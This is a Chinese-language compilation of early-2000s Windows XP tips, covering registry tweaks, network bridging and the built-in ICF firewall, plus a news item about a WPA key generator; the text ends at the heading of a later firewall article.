    问：我的电脑安装的是Windows XP系统，最近它的文件搜索功能不能用了，打开搜索界面时，输入文件或文件夹名的文本框是灰色的，无法输入。请问该怎么解决？

    答：打开注册表编辑器，定位到[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState]，新建字符串值“Use Search Asst”，设值为“no”。查看C:\Windows\System32\下的Shell32.dll文件语言版本，中文(0804)、英文(0600)等，将C:\Windows\Srchasst\mui\下原为0804或0409等的目录名改为与Shell32.dll语言版本相同的数字。现在打开搜索助理，是不是可以用了？


解决XP中CPU占用率过高问题

《一键清理系统垃圾》

解决XP中CPU占用率过高问题

[color=Blue]有这么一个现象，当安装windows XP的计算机收到445端口上的连接请求时，windows XP会分配内存并少量地调配CPU资源来为这些连接提供服务.当连接请求负荷过重时，就可能会造成CPU占用率过高，导致系统性能急剧下降，甚至会进入假死状态。点击“开始”→“运行”，在运行对话框中输入“Regedit”，点击“确定”，打开注册表编辑器，依次展开如下子键：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver，在其右侧窗口中新建一个名为“Maxworkitems”的DWORD值，然后双击它，在弹出的“编辑DWORD值”对话框中，根据计算机的内存容量来确定该键的键值，如果计算机内存小于512MB，请键入“256”；如果内存大于512MB，请设置为“1024”。完成操作后，退出注册表编辑器，重新启动计算机即可生效。


禁止winxp的默认硬盘共享

《一键清理系统垃圾》

禁止winxp的默认硬盘共享

禁止winxp的默认硬盘共享

编辑一个注册表文件，下面是内容：
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"autosharewks"=dword:00000000

然后保存为*.reg，执行后就可以取消win2000和winxp的默认硬盘共享了。

如果系统是服务器版本，文件内容如下：
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000

在注册表里的HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Lanmanserver/Parameters/修改或添加：AutoShareServer，双字节值为0，就可以关掉盘符共享了。同时，若修改或添加AutoShareWks，双字节值为0，就可以关掉Admin共享了。

win2000也是这样设置

如何判断XP是否已激活

1、开始→运行，在弹出的对话框中输入：oobe/msoobe /a，回车后系统会弹出窗口告诉你系统是 否已经激活。

2、开始－＞所有程序－＞附件－＞系统工具－＞WINDOWS激活，如果是这样的话，就恭喜你了，已经激活。你不信，可以点最后那个“WINDOWS激活”看一下就明白了。

如果是破解/没有激活，在“开始”－＞“所有程序”顶上就看见“WINDOWS激活”了！激活后，此项就隐藏起来了。

查看激活用了哪个CD－KEY?！

激活后才想起不知道是哪一个CD－KEY激活了XP，这时你只需运行附件中的“WinXP安装CD-Key的查看小工具.exe”即可查看！


禁止WinXP文件夹自动展开

《一键清理系统垃圾》

禁止WinXP文件夹自动展开

    WinXP的资源管理器里增加了一个比较人性化的功能，就是点击左侧的文件夹(或控制面板等)，如果该文件夹有子文件夹，它会自动展开此文件夹。一些用惯了老系统操作方式的用户，会嫌展开后滚动条加长，需要每次去点击展开后的“-”号。通过修改注册表即可以禁止这个功能。

    在注册表左侧展开主键[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]，把右窗口的名为“FriendlyTree”的DWORD值修改为“0”即可。返回资源管理器，点击一父目录，可以看到修改已经生效了。该主键下另一个名为“PersistBrowsers”的DWORD值是保存上次关机设置的开关状态，“1”为开，“0”为关。


快速启动与关闭WinXP操作系统

《一键清理系统垃圾》

快速启动与关闭WinXP操作系统

   每次启动Windows XP的时候，蓝色的滚动条都会不知疲倦地走上好几圈，对于追求高效率的你，是不是很希望它能少走几圈呢？其实我们完全可以把它的滚动时间减少，以加快启动速度。方法是：

    打开注册表编辑器，依次展开HKEY _ LOCAL _ MACHINE SYSTEM CurrentControlSet Control Session Manager Memory Management PrefetchParameters分支，在右侧窗口中区找到EnablePrefetcher子键，把它的默认值“3”修改为“1”。接下来用鼠标右键在桌面上单击“我的电脑”，选择“属性”命令，在打开的窗口中选择“硬件”选项卡，单击“设备管理器”按钮。在“设备管理器”窗口中展开“IDE ATA/ATAP控制器”，双击“次要IDE通道”选项，在弹出的对话框中选择“高级”选项卡，在“设备0”中的“设备类型”中，将原来的“自动检测”改为“无”，“确定”后退出。“主要IDE通道”的修改方法一致。现在重新启动计算机，看看你的滚动条滚动的时间是不是减少了？

    注意：使用VIA芯片主板的朋友不能修改“VIA BUS MASTER IDE CONTROLLER”选项。

    加快关机的速度

    在Windows XP中关机的时候，系统总会发送消息到运行程序和远程服务器，告诉它们系统要关闭，并等待接到回应后系统才开始关机。要想加快关机的速度，我们可以先设置自动结束任务的时间。方法是：

    打开注册表编辑器，依次展开HKEY_CURRENT _ USER Control Panel Desktop分支，找到AutoEndTasks子键，将其设置为1。再将该分支下的“HungAppTimeout”子键设置为“1000”，将“WaitTOKillService”改为“1000”（默认为5000）即可


妙用网桥在Windows XP下实现共享上网

《一键清理系统垃圾》

妙用网桥在Windows XP下实现共享上网

  所谓一端口共享上网，这里是指在同一局域网中，两机共用一个Hub或交换机端口共享上网。Windows XP之前，在微软的操作系统中这个思路恐怕很难实现，不过自从Windows XP发行之后，利用其中新增的“网桥”功能，要实现这一构想并不难。

    一局域网新增了一台客户机，但集线器端口已接满，这就意味着新增的那一台客户机不能接入局域网，连共享资源也访问不了，更不用说共享上网了。而网管又不打算增加集线
器，这时Windows XP的“网桥”功能就派上用场了，不过需要一个前提条件，就是局域网中必须有一台安装了双网卡的Windows XP系统客户机。前提条件已具备，构思很快就会实现，为了容易区分说明对象，以下将装了双网卡的客户机称为“客户A”，新增的那台客户机称为“客户B”，方法如下：

    首先确保“客户A”能够访问局域网上的资源和共享上网，打开“网络和拨号连接”，将原先连接局域网的“本地连接”重命名为“本地连接-主机”，将另一“本地连接”重命名为“本地连接-客户”，然后用双绞线(双机直联的方式)将“本地连接-客户”对应的网卡和“客户B”机上的网卡直接连接起来。

    接下来在“客户B”机上设置网络属性，指定一空IP地址和“计算机名”，其他设置如“子网掩码”、“默认网关”、“DNS服务器”、“工作组”和“客户A”机的设置相同。

    现在如果“客户A”和“客户B”能够互相访问共享资源，那么就说明已经成功一半了，接下来需要做的就是用Windows XP的“网桥”将“本地连接-主机”和“本地连接-客户”连接起来。

    在“客户A”机上进入“网络和拨号连接”窗口，在“本地连接-主机”上单击右键，点击选单中的“网桥”命令，系统开始给这两个连接进行桥接，当桥接成功后打开“网桥”属性页，将所有适配器都设成连接本地网，现在打开IE浏览器，“客户B”机也可访问Internet了，至此实现了在局域网中双机共用一Hub端口共享上网。

    按照这个方法，如果局域网中再新增客户机，就可以用局域网中的另一台客户机将新增的客户机桥接起来，依此类推，如果以上方法中的“客户B”机也可以桥接客户机的话，那么可以这样说，局域网只需一个Hub就够了，不过如果新增的客户机比较多，建议这种情况还是另购置一Hub为好，不仅“桥接”是需要添加网卡的。对此主题如果还有更好的实现方法，希望大家发表补充。


内置于windows xp的防火墙ICF

《一键清理系统垃圾》

内置于windows xp的防火墙ICF

  ICF是"Internet Connection Firewall"的简称，也就是因特网连接防火墙。ICF建立在你
的电脑与因特网之间，它可以让你请求的数据通过、而阻碍你没有请求的数据包，是一个基于
包的防火墙。所以，ICF的第一个功能就是不响应Ping命令，而且，ICF还禁止外部程序对本机
进行端口扫描，抛弃所有没有请求的IP包。

    个人电脑同服务器不一样，一般不会提供诸如Ftp、Telnet、POP3等服务，这样可以被黑
客们利用的系统漏洞就很少。所以，ICF可以在一定的程度上很好地保护我们的个人电脑。

    ICF是状态防火墙，可监视通过的所有通讯，并且检查所处理的每个消息的源和目标地址
。为了防止未经请求的通信进入系统端口，ICF保留了所有源自本地计算机的通讯表。在单独
的计算机中，ICF将跟踪源自本地计算机的通信，所有Internet传入通信都会针对于该表中的
各项进行比较。只有当通讯表中有匹配项时（这说明通讯交换是从计算机或专用网络内部开始
的），才允许将传入Internet通信传送给网络中的计算机。

    源自外部ICF计算机（也就是入侵计算机）的通讯（如Internet非法访问）将被防火墙阻
止，除非在"服务"选项卡上设置允许该通讯通过。ICF不会向你发送活动通知，而是静态地阻
止未经请求的通讯，防止像端口扫描这样的常见黑客袭击。

    ICF的原理是通过保存一个通讯表格，记录所有自本机发出的目的IP地址、端口、服务以
及其他一些数据来达到保护本机的目的。 当一个IP数据包进入本机时，ICF会检查这个表格，
看到达的这个IP数据包是不是本机所请求的，如果是就让它通过，如果在那个表格中没有找到
相应的记录就抛弃这个IP数据包。下面的例子可以很好地说明这个原理。当用户使用Outlook
Express来收发电子邮件的时侯，本地个人机发出一个IP请求到POP3邮件服务器。ICF会记录
这个目的IP地址、端口。当一个IP数据包到达本机的时候，ICF首先会进行审核，通过查找事
先记录的数据可以确定这个IP数据包是来自我们请求的目的地址和端口，于是这个数据包获得
通过。来看一下当使用Outlook Express客户端邮件程序和邮件服务器时的情况。一旦有新的
邮件到达邮件服务器时，邮件服务器会自动发一个IP数据包到Outlook客户机来通知有新的邮
件到达。这种通知是通过RPC Call来实现的。当邮件服务器的IP数据包到达客户机时，客户机
的ICF程序就会对这个IP包进行审核发现本机的Outlook express客户端软件曾发出过对这个地
址和端口发出IP请求，所以这个IP包就会被接受，客户机当然就会收到发自邮件服务器的新邮
件通知。然后让Outlook Express去接收邮件服务器上的新邮件。

    设置ICF

    1、启用或禁用Internet连接防火墙

    打开"控制面板"中的"网络连接"

    单击要保护的拨号、本地连接或其它Internet连接，然后在"网络任务"→"更改该连接的
设置"→"高级"→"Internet 连接防火墙"下，选中如图所示的项目：

    若要启用Internet连接防火墙，选中"通过限制或阻止来自Internet的对此计算机的访问
来保护我的计算机和网络"复选框。若要禁用Internet连接防火墙，清除该复选框。

    网络服务

    还是上面的"高级"选项卡，点击下方的"设置"项，如下图：

    已经有选中的项目表示网络用户能够存取的服务，如：messenger，远程桌面，FTP，Tel
net等。

    对于一些常见的网络服务，如POP3，SMTP、HTTP等，系统会在需要的时候开放。

    如果我们要设置一个新的服务项目，以常见的messenger文件传输为例，因为许多朋友都
会在这方面遇到问题，实际上在HELP中写的明白。

    messenger的文件传输采用TCP6891-6900端口，可以在xp的防火墙设置里面增加TCP6891号
端口，文件就可以顺利发送了。文件传输的进程，一般情况下我们添加一个就行了。

    添加方法见图：

    按要求依次写入"描述"，"本机的IP地址"，使用的端口号（6891），然后确定即可。

安全日志

    生成安全日志时使用的格式是W3C扩展日志文件格式，这与在常用日志分析工具中使用的
格式类似。

    打开"网络连接"，单击要在其上启用Internet连接防火墙（ICF）的连接，然后在"网络任
务"→"更改该连接的设置"→"高级"→"设置"→"安全日志记录"→"记录选项"下，选择下面的
一项或两项：

    若要启用对不成功的入站连接尝试的记录，请选中"记录丢弃的数据包"复选框，否则禁用
。

    2、更改安全日志文件的路径和文件名

    打开"网络连接"，选择要在其上启用Internet连接防火墙的连接，然后在"网络任务"→"
更改该连接的设置"→"高级"→"设置"→"安全日志记录"→"日志文件选项"→"浏览"中，浏览
要放置日志文件的位置。

    在"文件名"中，键入新的日志文件名，然后单击"打开"。打开后可查看其内容。

    还可以设置安全日志文件的大小，打开已启用Internet连接防火墙的连接，然后在"网络
任务"→"更改该连接的设置"→"高级"→"设置"→"安全日志记录"→"日志文件选项"→"大小限
制"中，使用箭头按钮调整大小限制。笔者认为，一般512K足够了。

    如果你在更改设置后有问题，可以还原默认的安全日志设置。打开启用Internet连接防火
墙的连接，然后点击"网络任务"→"更改该连接的设置"→"高级"→"设置"→"安全日志记录"→
"还原默认值"。

    记录成功的连接--这将登录来源于家庭、小型办公网络或Internet的所有成功的连接。

    当你选择"登录成功的外传连接"复选框时，将收集每个成功通过防火墙的连接信息。例如
，当网络上的任何人使用Internet Explorer成功实现与某个网站的连接时，日志中将生成一
条项目。

    记录放弃的数据包--这将登录来源于家庭、小型办公网络或Internet的所有放弃的数据包
。

    当你选择"登录放弃的数据包"复选框时，每次通信尝试通过防火墙却被检测和拒绝的信息
都被ICF收集。例如，如果你的Internet控制消息协议没有设置成允许传入的回显请求，如Pi
ng和Tracert命令发出的请求，则将接收到来自网络外的回显请求，回显请求将被放弃，然后
日志中将生成一条项目。

    Internet控制消息协议（ICMP）

    "网络消息协议（ICMP）"是所需的TCP/IP标准，通过ICMP，使用IP通讯的主机和路由器可
以报告错误并交换受限控制和状态信息。

    在下列情况中，通常自动发送ICM消息：

IP数据报无法访问目标。

IP路由器（网关）无法按当前的传输速率转发数据报。

IP路由器将发送主机重定向为使用更好的到达目标的路由。

    应用Internet控制消息协议：

    打开"网络连接"。 单击已启用Internet连接防火墙的连接，在"网络任务"→"更改该连接
的设置"→单击"高级"→"设置"→"ICMP"选项卡上，选中希望你的计算机响应的请求信息类型
旁边的复选框。

    ICF的局限性

    那么，ICF不能做什么？ICF可不可以完全替代现有的个人防火墙产品？ICF是通过记录本
机的IP请求来确定外来的IP数据包是不是"合法"，这当然不可以用在服务器上。为什么呢？服
务器上的IP数据包基本上都不是由服务器先发出，所以ICF这种方法根本就不可以对服务器的
安全提供保护。当然你也可以通过相应的设置让ICF忽略所有发向某一端口的数据包，例如80
端口。那么发向80端口的所有数据包都不会被ICF抛弃。从这种意义上讲80端口就成为不设防
的端口。这样的防火墙产品是不可能用在应用服务器上的，服务器上的防火墙产品都是基于建
立各种策略来审核外来的IP数据包。ICF和基于应用程序的个人防火墙产品也是不一样的。基
于应用程序的个人防火墙会记录每一个访问Internet的程序，例如，通过设置可以让IE有权来
访问Internet而Netscape的Navigator没有权限来访问Internet，即便两个程序的目的IP地址
和端口都是一样的。Norton的个人防火墙（Personal Firewall）就是这样一个典型的产品。
简而言之，ICF没法提供基于应用程序的保护，也没法建立基于IP包的包审核策略。所以，IC
F既不能完全替代现有的个人防火墙产品，也没有办法很好地工作在应用服务器上。

    笔者认为，Norton的个人防火墙和Zonealarm Pro可以提供较全方面的保护，但设置较为
复杂。ICF并不能提供完全无懈可击的防护，但是ICF对个人电脑提供防护是足够的。在使用一
些系统安全软件对装有ICF的个人电脑进行端口扫描后，常会给出了"系统安全"的评价。况且
，ICF是Windows XP内建的功能，占用的资源相当少且不用花额外的钱去购买。从ICF受益最多
的应该是那些仍然在使用Modem上网的朋友，在国内绝大部分的用户都是用Modem上网的。首先
，你上网的时间不会太长，一般在几小时上下（包月的除外）。其次，每次建立连接后拨号服
务器都会分配一个新的IP地址（动态地址分配）给你，长时间占用一个相同的IP的可能性应该
很低。比起使用ADSL和其它宽带的用户来讲，用Modem上网本身就安全了很多。

    注意事项

    ICF和家庭或小型办公室通讯--不应该在所有没有直接连接到Internet的连接上启用Inte
rnet连接防火墙，也就是最好不要在局域网中使用。如果在ICF客户计算机的网络适配器上启
用防火墙，则它将干扰该计算机和网络上的其他计算机之间的一些通讯。如果网络已经具有互
联网防火墙或代理服务器，则不需要Internet连接防火墙，你应该关闭它。

    所以，使用一个重量级的防火墙实在是没有太多的意义。而ICF则刚刚好，它既提供了一
定的保护，而且又不太占用资源，不错的，是"又经济，又实惠"。


品味WinXP与众不同的文件管理

《一键清理系统垃圾》

品味WinXP与众不同的文件管理

2002-03-07　　　　作者：垂天翼

    文件是电脑管理和存储数据的基本单位，而文件夹就象存储文件的抽屉，有效地管理文件和文件夹可以大大提高我们的工作效率。Windows Xp在文件的管理和使用方式上都较过去版本的Windows操作系统有了明显的变化与改进。

    比如，可以用全新文件查看方式来查看文件和文件夹的详细信息，可以更为直观地在网页中执行任务，可以快速方便地压缩与运行文件和文件夹，将某些文件类型与特定程序关联时有了更多选项，等等。无论是在形式还是在功能上，Windows Xp在文件的管理方面都有更多的新意值得我们去体验和享受。

    一、多功能的“任务窗格”新面孔

    过去我们是通过打开“我的电脑”或“资源管理器”来进行文件和文件夹的管理与操作，而且也不仅仅局限在简单地打开一个文件或文件夹，更多地还要进行其它任务，因此我们常常不得不在多个窗口中来回切换。虽然有时可以通过右键菜单帮助完成一些任务，但其功能也毕竟有限。

    但在Windows Xp中，由于引入了“任务超级链接”的新概念，在功能上给我们带来了许多便利。当你打开“我的电脑”时，就会看到XP崭新的文件管理窗口。窗口由左右两部分组成，右窗格与过去没有太大的变化，只是感觉图标比以前稍大些；但左窗格变化较大，增加了更多的任务链接，形成了其“任务窗格”。“任务窗格”由三个“子任务窗格”组成，即“系统任务”窗格、 “其它位置”窗格和“详细信息”窗格。但当你打开“我的电脑”中的一个逻辑分区时，“系统任务”窗格就变成了“文件和文件夹任务”窗格。这些窗格中列出了一些常用的操作任务，使用户进行文件和文件夹操作更为方便。

Windows Xp还能够自动根据你选择的文件类型，在任务窗格中出现相对应的文件任务选项。比如，当你在“文件和文件夹任务”窗格中选中一个文件夹，那么在“文件和文件夹任务”窗格中就会相应增加关于文件夹的操作任务，如重命名、移动、复制、删除这个文件夹或将这个文件夹发布到Web、共享这个文件夹。而只要你打开不同类型的文件夹，就会增加相应的“任务窗格”。

    比如，如果你打开了一个含有图象文件的文件夹，则在“任务窗格”中会自动增加一个“图象任务”窗格，而同时右边的窗口也会发生很大变化：在右边窗格的上部，会出现被你选中的图片的预览图片，下方则是该文件夹中所有图片的缩略图。如果你选中的是多媒体视频文件，“任务窗口”就会增加一个“视频任务”窗格。

    二、会“变脸”的文件管理窗口

    如果你喜欢怀旧或对Windows Xp的文件管理新窗口不满意，也可以很方便地让它变回原来的面孔。打开“工具”下拉菜单，点击“文件夹选项”，在打开的“文件夹选项”设置窗口中选择“使用Windows传统风格的文件夹”单选钮，点击“确定”就可以让你回到过去熟悉的文件夹窗口。在Windows Xp中，其资源管理器窗口也仍然使用的Windows传统风格的文件窗口。

另外，留心的朋友可能会发现，在Windows Xp风格的文件窗口中，右窗格中不仅仅只是文件图标稍微变大而已，它还在以前的缩略图、图标、列表和详细信息四种显示方式的基础上，增加了“平铺”这种新的文件显示方式。这种文件或文件夹显示方式增大了文件的图标，并且在图标旁边显示了文件的一些基本信息，如文件的名称、大小、修改日期、应用程序文件中的制造商名称等，可以让你很快找到自己需要的信息。

    三、全面开花的压缩文件管理模式

    过去使用电脑的人几乎没有不使用压缩工具的。由于压缩文件或文件夹具有容量小、在电脑驱动器或移动存储设备上占用空间少、可以减少网络传输时间等优势，因此压缩文件尤其是ZIP压缩格式的文件得到了广泛的应用。

    但在以前版本的Windows操作系统下对文件进行压缩和解压缩操作都必须使用专门的软件，而在Windows Xp中我们可以告别那些压缩工具了，因为Windows Xp操作系统自身已经具备了“压缩”、“解压缩”和“直接运行”全面开花的压缩文件管理模式。我们可以通过Windows Xp提供的右键菜单选项“发送到”→“压缩文件夹”选项直接压缩文件或文件夹。它可以压缩一个文件夹，也可以压缩文件夹下的一个、多个或全部文件。解压缩就更简单了，直接双击该压缩文件，就象操作一个普通文件夹一样把其中的文件和文件夹拷贝出来即可。甚至在一般情况下，完全可以不必将ZIP文件解压就可以直接使用。

    因为Windows Xp在文件夹窗口中将ZIP文件是直接当作一个文件夹对待的，其操作方法当然就和普通文件夹一样了。当然，Windows Xp的“ZIP压缩文件夹”功能还很简单，与Winzip等专门的压缩工具软件相比还有一些差距，比如，不能自定义压缩文件名，不能自定义解压缩文件名，不能分卷压缩，不能设置压缩比率，等等。但是对于一般的文件压缩与解压缩操作来说，操作比较方便，特别是它可以直接运行或打开压缩文件包里的文件，可以省去解压过程，大大简化了操作。

    四、能自动播放的多媒体文件

    随着电脑多媒体技术的发展和多媒体时代的来临，许多朋友的电脑中存放了大量的多媒体文件。在以前版本的Windows操作系统下，多媒体文件和普通文件一样是以图标或列表形式显示，而Windows Xp可以自动识别这些多媒体文件，并用相应的图标表示文件或文件夹，双击它还可以自动打开文件以查看或播放。比如，你双击一个图象文件，Windows Xp的“图片和传真查看器”就会打开这个图象文件。

而且使用Windows Xp的“图片和传真查看器”，可以查看图象、旋转图象并执行基本的图片文档操作，你还可以以幻灯片播放方式查看当前文件夹下的图象文件。如果是声音或视频文件，双击文件即可以弹出Windows Xp集成的媒体播放器Media Player 8.0开始播放。Media Player 8.0支持很多最新的多媒体文件，甚至能自动播放DVD。

    五、能个性化定义的文件夹

    在Windows Xp操作系统中，还可以对一些特殊类型的文件夹（如各种多媒体文件夹）进行个性化定义，通过其“个性”不但可以方便我们区分文件类型，而且也便于系统识别。自定义文件夹的方法是，选择文件夹，在右键菜单中单击“属性”选项，就可弹出文件夹“属性”设置窗口。

    1、自定义文件夹类型模板　选择文件夹“属性”设置窗口的“自定义”选项卡，打开“用此文件类型作为模板”下拉列表，在这个下拉列表中共有七种模板类型，分别是文档、图片、相册、音乐、音乐艺术家、音乐集和视频。其中除“文档”类型外，其余都属于多媒体文件类型。如果你选择其中的一个模板，就可把该文件夹定义为对应类型的文件夹。如果你选中了“将此模板应用到所有子文件夹”复选框，你就可将你选择的那个文件夹模板应用到自定义文件夹中包含的所有文件夹。

    2、自定义文件夹缩略图的图片　以缩略图方式显示的文件夹，除图象文件夹以外的图标中并没有缩略图，即使是图象文件夹也只能由文件夹中最后修改的四个图片缩略图来表示。但如果你使用自定义文件夹的“文件夹图片”功能，就可以自定义任何文件夹图标所显示的图片。在如图5已经打开的文件夹“属性”设置窗口中，点击“选择图片”按钮，然后在选择图象文件的对话框中选择一个合适的图象文件，你可以在当前的文件夹中选择，也可以从其它任意文件夹中选择。如果你想恢复系统原来的默认图标，只要在文件夹“属性”设置窗口中点击“还原默认图标”按钮，并单击“应用”或“确定”即可。

    从上文我们可以看出，Windows Xp操作系统在文件管理方面不仅给我们带来了许多新意，而且在功能设计上更为多样、周全和智能化。Windows Xp充满个性化的文件管理功能，不仅能让Windows玩家“玩”出更多花样来，也给我们每个普通操作者带来使用上的便利和超酷的享受！


破解Windows XP中WPA的武器现身？

《一键清理系统垃圾》

破解Windows XP中WPA的武器现身？

2002-3-2　　　　 作者：

微软公司负责产品激活技术的产品经理艾伦·尼曼曾说过，“任何知识产权保护技术最终都会被攻破，这只是一个时间问题而已。”随着上周能够生成有效的Win XP安装和激活密钥的密钥生成器的出现，艾伦的预言是否成为了现实?

在Win XP诞生的前后，Win XP中使用的新反盗版激活技术WPAWindows Product Activation——始终是人们争论的话题。破解Win XP的WPA也始终是海外技术高手们的一个挑战对象。

一、WPA现在是否还是金身?

的确，已经有许多声称可以破解WPA的软件诞生，但是几乎所有的软件最后都被证实没有什么太大的用处。只有一个企业版本泄露的Key似乎还有一些用处。但是，这只是一个临时的方法，因为在加过补丁的Win XP SP版本中，这个Key势必会被取消。

就在上周，据说可以真正破解WPA的软件出现了。这个Key生成器首先是在德国的一家网站(http://www.heise.de)上广为流传，据称该生成器是由一个俄国人开发完成。而且该网站测试了这个Key生成器并说它确实可以产生Win XP和Office XP的Key号码。它通过高强度长时间计算来得到一个合法的Win XP激活号码的方法来达到破解WPA的目的。从这个意义上来说，它和John的工作原理有些相似，后者是一个以穷举法暴力破解而著称的黑客软件。如果读者对于John有些了解的话，一定马上就想到了这个破解程序一定非常耗费时间。根据Heise网站上的测试，真要通过这个软件得到一个正确的Key是一件相当费力的事情。

如果该软件真能生成一个真正的Key号码，微软是否有办法识别出合法的Key号码和通过破解软件得到的Key号码。如果微软找到了方法，那么在可以预期的将来，微软同样会通过使用SP补丁的方法屏蔽掉破解软件产生的号码。但是如果微软自己也无法进行辨别的话，那么便意味着从今以后我们的XP都脱离了微软的控制，因为生成一个可以使用的WPA的Key号码就和烤面包一样简单了。

二、看看这个Key生成器

微软一贯声称，盗版的Windows用户得不到微软的技术支持和授权保护，但如果生成的密钥是真的，对于微软的技术支持人员而言，使用盗版的Windows用户和正版的Windows用户是没有任何区别的。

大家可以从图1中看到该生成器的主要界面图，其中可以选择Win XP PRO/CORP/HOME、Office XP Pro/PLUS和Visio XP PRO查找对象，再进行查找。通过一定的查找设置，如果找到了相对应的Key，该软件会通过一个表单给用户提供出来。

三、大家的反应

微软的发言人最近表示，微软公司正在对这一“可能破坏产品密钥”的产品进行调查，微软已经想到会有人这样作，而且正在开发相关的技术。需要特别指出的是，产品激活只是微软反盗版技术中的一种，微软采取了多种层次的反盗版技术。微软还是将始终不渝地改进产品激活技术和其他的知识产权保护技术。

但就微软本身看来，WPA已经超出了其预期值。目前这种技术成功的标准并不是它能在一定程度上制止了盗版，而是它使微软产品的许可销售大大增加。WPA也成为2001年业界最热门话题之一，而且Win XP的销量是乎也因此而比较理想，这都表明WPA已经达到了微软的目的。

有网友评论称，尽管微软在Win XP中采用了WPA，但这种技术根本不能阻止盗版，充其量不过是加大盗版的难度而已。

一位网友称，对于密钥生成器的出现表示失望，这是违法的，也不符合业界的游戏规则，也是违规的。

另有网友评论，在配置PⅢ500的机器上，用了3.5个小时得到了8组有效的产品密钥。尽管对这样的成绩表示满意，但希望采用多线程等技术进一步提高程序的运行效率。

编后：如果该生成器生成的注册码真能成功破解微软的XP软件，它会带来一种什么样的局面呢?

生成器的好处：它将促使微软发明和创建新的产品密钥生成方法，也可能导致微软对产品密钥的担心。

生成器的坏处：就有人能够生成产品密钥，并激活Win XP，尽管这对于这些用户而言是一件好事，但对于购买了Win XP、必须与WPA打交道的终端用户而言，却不是一件好事了。

其实尽管密码生成器对于微软不是一个好消息，但只要其WPA电话激活密钥系统还没有被攻破，微软就无需着急。


巧装大硬盘上XP

《一键清理系统垃圾》

巧装大硬盘上XP

2002-02-25　　　 作者：天极

软美轮美奂又功能强大的XP推出了，看着别人的P4、速龙1900+等等强劲的系统跑XP，你是不是觉得自己的配置太可怜了呢？不用着急，XP其实是一个对储存设备依赖性很强的操作系统，CPU倒是在其次的，建议你升级一下内存和买一个新硬盘，就可以上XP了，不必整个系统都买新的。

也许有的人会说，但是我的主板芯片组太旧了，不支持30G以上的大硬盘，又找不到新的BIOS来刷新了，怎么办呢？放心，下面就教你一招巧装大硬盘上XP的秘技，这个秘技也适用于那些新买了大硬盘升级想组成双硬盘系统，却发现主板不支持的人。

首先，为了节省时间，你可以让卖硬盘的商家为你的新大硬盘分好区，建议你把打算上XP的分区设为3G左右。然后，你可以把大硬盘跳为从盘，如果有不同容量跳线的，请用出厂的默认跳法，在CMOS里设置为NONE；然后，用XP的安装光盘启动计算机，一般会自动开始XP的安装程序，（如果没自动开始XP安装，你可以进入I386目录，键入WINNT开始）你会发现XP的安装程序已经识别出了你现挂的两个硬盘，无论是型号还是容量都准确无误，还具有格式化分区、转化分区为NTFS系统的功能。

此时，你可以选择将XP装在新硬盘的3G分区里，一般都能顺利地进行。这是利用了XP的安装程序有直接检测和管理硬件设备的能力，不需调用BIOS数值的特性。当然，这还是有个小缺点的，在进入图形界面以前，你旧有的硬盘必须正常，否则XP是无法启动的，因为XP安装程序会向其中写入一部分启动必需文件。不过总比你眼巴巴地看着大硬盘不能利用要好多了。


巧妙清除Windows XP任务栏的隐藏图标记录

《一键清理系统垃圾》

巧妙清除Windows XP任务栏的隐藏图标记录

在Windows XP中的自动隐藏不活动的图标，可以解决系统托盘区占用过多的任务栏空间。可时间长了，右击任务栏空白处选择“属性”，在 “任务栏”选项中点击“自定义”按钮，会在“过去的项目”栏里看到很多历史记录，删除这些项目的方法是：打开注册表，找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\TrayNotify”，其中“IconStreams”项存储着“当前项目”而“PastIconsStream”项存储着“过去的项目”，将“TrayNotify”项删除，按Ctrl+Alt+Del组合键调出“Windows任务管理器”，单击进程选项卡，选择explorer.exe，结束进程。之后在“Windows任务管理器”中选“文件”→“新建任务”，在“创建新任务”中输入explorer.exe即可。


取消WinXP中[我的电脑]中用户文档的显示图标

《一键清理系统垃圾》

取消WinXP中[我的电脑]中用户文档的显示图标

刚刚安装完毕的Windows XP，一打开[我的电脑]，就会看到在[在这台计算机上存储的文件]这个栏目，很不好看！虽然便于操作，但是会觉得影响外观，其实，通过修改注册表特定的键值是可以取消的。

方法很简单，打开注册表编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，新建2进制值，命名为：NoSharedDocuments，修改其值为 01 00 00 00 ，注销以后就可以看到效果。

相应的REG文件的内容就是：

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSharedDocuments"=hex:01,00,00,00


取消WinXP专业版中的保留的带宽

《一键清理系统垃圾》

取消WinXP专业版中的保留的带宽

    2002-01-30　　　　 作者：

由于专业版在网络上的需要，所以设定了20%的默认保留带宽，其实对于个人用户，这些保留的带宽是没有用处的，那么有没有办法设置为不保留呢？有啊!就是使用组策略编辑器。
        运行中输入gpedit.msc，打开组策略编辑器，找到计算机配置--管理模板--网络--QoS数据包调度程序，选择右边的限制可保留带宽，选择属性就可以打开图2所示图片，选择禁用即可把保留的带宽还给你！这个对于使用Modem的用户是很有用处的


全面实战Windows XP防火墙

《一键清理系统垃圾》

全面实战Windows XP防火墙

2002-01-11　　　　　　作者：邹子

    新一代操作系统WINDOWS XP已正式发布，它增加了许多十分重要的新的网络功能，例如Internet连接防火墙（ICF）就是充当网络与外部世界之间的保卫边界的安全系统。Internet连接防火墙（ICF）是用来限制哪些信息可以从你的家庭或小型办公网络进入Internet以及从Internet进入你的家庭或小型办公网络的一种软件。

    如果网络使用Internet连接共享（ICS）来为多台计算机提供Internet访问能力，则建议你应该在共享的Internet连接中启用ICF。ICS和ICF也可以单独启用，比如说可在直接连接到Internet的任何一台计算机上启用ICF。

    一、工作原理

